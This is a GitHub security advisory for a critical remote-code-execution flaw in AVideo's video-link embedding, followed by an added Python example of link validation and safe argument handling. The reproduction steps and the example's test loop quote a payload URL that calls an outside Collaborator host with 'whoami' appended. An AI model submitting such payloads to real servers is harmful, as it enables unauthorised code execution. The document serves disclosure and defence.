GHSA-pgvh-p3g4-86jw: RCE when embedding a video link

Description:
I found a very critical vulnerability in your open source program called RCE (Remote Code Execution), where an attacker can arbitrarily execute code on the server.

Impact:
An attacker could execute remote code on your system.

Steps to Reproduce:
- Go to the My Videos tab: https://demo.avideo.com/mvideos
- Click “Embed a video link”
- Get your Burp Suite Collaborator link. Example: o4ta880iz4vap09kaqw400po8fe52u.oastify.com
- Now put this RCE payload in the Video Link field: http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?whoami then click Save
- Now go to the Burp Suite Collaborator client and see the response
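The steps above show a link submitted through the "Embed a video link" form reaching the server unchecked and triggering an outbound callback. The following is an added example, not the advisory's or AVideo's own code (AVideo is written in PHP; Python is used here only for illustration). It shows the defensive pattern for such a field: an explicit validation policy applied before the link is stored or fetched, and an argument vector built so that the link is never re-parsed by a shell. The host allowlist, the `EmbedLinkError` type and the `downloader` command name are assumptions made for this illustration; the advisory does not state which code path in AVideo handled the link.

```python
"""Hardening pattern for a user-supplied "embed a video link" field.

Added illustration, not AVideo code. The advisory does not say which code
path consumed the payload, so this assumes the usual root cause for this
class of bug (a raw URL string reaching a shell command or an unrestricted
server-side fetch) and shows the two controls that close it:

  1. validate the link against an explicit policy before storing it, and
  2. when a fetch tool must be spawned, pass the link as a single argv
     element so the shell never gets a chance to interpret it.
"""
from urllib.parse import urlsplit

# Hypothetical policy: only well-known video hosts may be embedded. This also
# stops the server from fetching attacker-controlled hosts (the Collaborator
# callback in the advisory is exactly such a fetch).
ALLOWED_HOSTS = {
    "www.youtube.com", "youtube.com", "youtu.be",
    "vimeo.com", "player.vimeo.com",
}
ALLOWED_SCHEMES = {"http", "https"}
# Characters with meaning to a POSIX shell; a legitimate video URL never needs them.
SHELL_META = set(";&|`$<>\"'\\\n\r ")
MAX_LINK_LENGTH = 2048

# Hypothetical downloader binary name; any real tool would be invoked the same way.
DOWNLOADER = "downloader"


class EmbedLinkError(ValueError):
    """Raised when a submitted link is rejected by policy."""


def validate_embed_link(raw: str) -> str:
    """Return the normalised link if it is acceptable, else raise EmbedLinkError."""
    if not isinstance(raw, str) or not raw or len(raw) > MAX_LINK_LENGTH:
        raise EmbedLinkError("link missing or too long")
    if any(c in SHELL_META for c in raw):
        raise EmbedLinkError("link contains shell metacharacters")
    parts = urlsplit(raw)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise EmbedLinkError(f"scheme not allowed: {parts.scheme!r}")
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        raise EmbedLinkError(f"host not allowed: {host!r}")
    if parts.username or parts.password:
        raise EmbedLinkError("credentials in link are not allowed")
    return parts.geturl()


def is_allowed_embed_link(raw: str) -> bool:
    """Boolean convenience wrapper around validate_embed_link()."""
    try:
        validate_embed_link(raw)
        return True
    except EmbedLinkError:
        return False


def build_fetch_argv(link: str) -> list:
    """Build the argv for the downloader.

    The validated link is a single element, so nothing inside it can become a
    separate command, and the leading '--' stops a link that starts with '-'
    from being read as an option. Consume it with
    subprocess.run(argv, shell=False); never join it into one shell string.
    """
    return [DOWNLOADER, "--", validate_embed_link(link)]


if __name__ == "__main__":
    # Constructed inputs: the payload quoted in the advisory and a benign link.
    for candidate in (
        "http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?whoami",
        "https://www.youtube.com/watch?v=dQw4w9WgXcQ",
    ):
        try:
            print("accepted:", build_fetch_argv(candidate))
        except EmbedLinkError as exc:
            print("rejected:", candidate, "->", exc)
```

The allowlist is the control that rejects the advisory's payload: the URL itself is syntactically valid, so a parser alone would let it through, and only an explicit host policy (plus refusing to hand the string to a shell) removes both the command-injection and the server-side-fetch risk.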
Critical severity • GitHub Reviewed • Published Jan 31, 2023 in WWBN/AVideo • Updated Feb 2, 2023

Vulnerability details
Package: wwbn/avideo (GitHub Actions)
Affected versions: < 12.4
Patched versions: 12.4
References
- GHSA-pgvh-p3g4-86jw
Last updated: Feb 2, 2023
Reviewed: Feb 2, 2023
Published to the GitHub Advisory Database: Feb 2, 2023
DanielnetoDotCom published to WWBN/AVideo: Jan 31, 2023
Severity: Critical
Weaknesses: No CWEs
CVE ID: No known CVE
GHSA ID: GHSA-pgvh-p3g4-86jw
Source code: WWBN/AVideo